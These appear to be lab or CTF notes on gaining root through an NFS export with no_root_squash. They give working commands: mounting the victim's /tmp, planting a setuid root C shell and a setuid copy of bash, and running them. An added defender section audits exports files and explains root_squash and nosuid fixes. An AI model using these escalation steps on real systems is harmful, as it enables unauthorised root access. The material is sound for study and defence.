Check the NFS exports on the victim:
cat /etc/exports
This means that the /tmp folder is shared and can be mounted remotely, so we can mount it.
How?
On Kali:
showmount -e 10.10.231.117
(This is the victim machine's IP.)
The output shows that we can mount /tmp.
Make a directory for the mount point:
mkdir /tmp/mountme
sudo mount -v -o rw,vers=3 10.10.221.115:/tmp /tmp/mountme
On Victim: (This isn’t working, alternative at the bottom)
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/x.c
gcc x.c -o x
Compile (on Kali, through the mount):
gcc /tmp/mountme/x.c -o /tmp/mountme/x
Add perms (root ownership plus the setuid/setgid bits):
sudo chown root:root /tmp/mountme/x
sudo chmod +s /tmp/mountme/x
On the victim, in the /tmp folder of the SSH session:
/tmp/x
Alternative (bash, no compile):
On Victim:
cp /bin/bash /tmp/bash
On Kali:
sudo mount -v -o rw,vers=3 10.10.221.115:/tmp /tmp/mountme
sudo chown root:root /tmp/mountme/bash
sudo chmod +s /tmp/mountme/bash
On Victim:
/tmp/bash -p
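
Defender-side check (added example, not part of the original notes): a root-owned setuid file written from a client is only honoured when the export carries no_root_squash, so this audits an exports file for that option. The function name audit_exports and the sample entries are constructed; quoted paths containing spaces are not handled.

```shell
# Added example: flag NFS exports that disable root squashing.
# audit_exports and the sample entries below are constructed for illustration.

audit_exports() {
    # Usage: audit_exports [FILE]   (default: /etc/exports)
    # Prints "path client options" per risky entry; returns 1 if any is found.
    awk '
    {
        sub(/#.*/, "")                                        # strip comments
        if (sub(/\\[ \t]*$/, "")) { buf = buf $0 " "; next }  # continuation line
        $0 = buf $0; buf = ""                                 # re-split joined line
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {                                      # client(opt,opt,...)
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1)
                sub(/\)$/, "", opts)
            } else if (substr($i, 1, 1) == "-") {             # -opt,opt default list
                client = "<defaults>"
                opts = substr($i, 2)
            }
            if (client == "") client = "<anyone>"
            if (("," opts ",") ~ /,no_root_squash,/) {
                print $1, client, opts
                bad = 1
            }
        }
    }
    END { exit bad + 0 }
    ' "${1:-/etc/exports}"
}

# Constructed sample: only the /tmp and /home/backup (192.0.2.10) entries are risky.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed exports file
/tmp          *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/share    192.0.2.0/24(ro,sync,root_squash)
/home/backup  192.0.2.10(rw,no_root_squash) \
              192.0.2.11(ro)
EOF
audit_exports "$sample" || echo "exports with no_root_squash found"
rm -f "$sample"
```

Removing no_root_squash from a flagged entry (root_squash is the default) and re-exporting with exportfs -ra maps remote root to an unprivileged user. Mounting the exported filesystem nosuid on the server also keeps a planted setuid binary from running with elevated privileges.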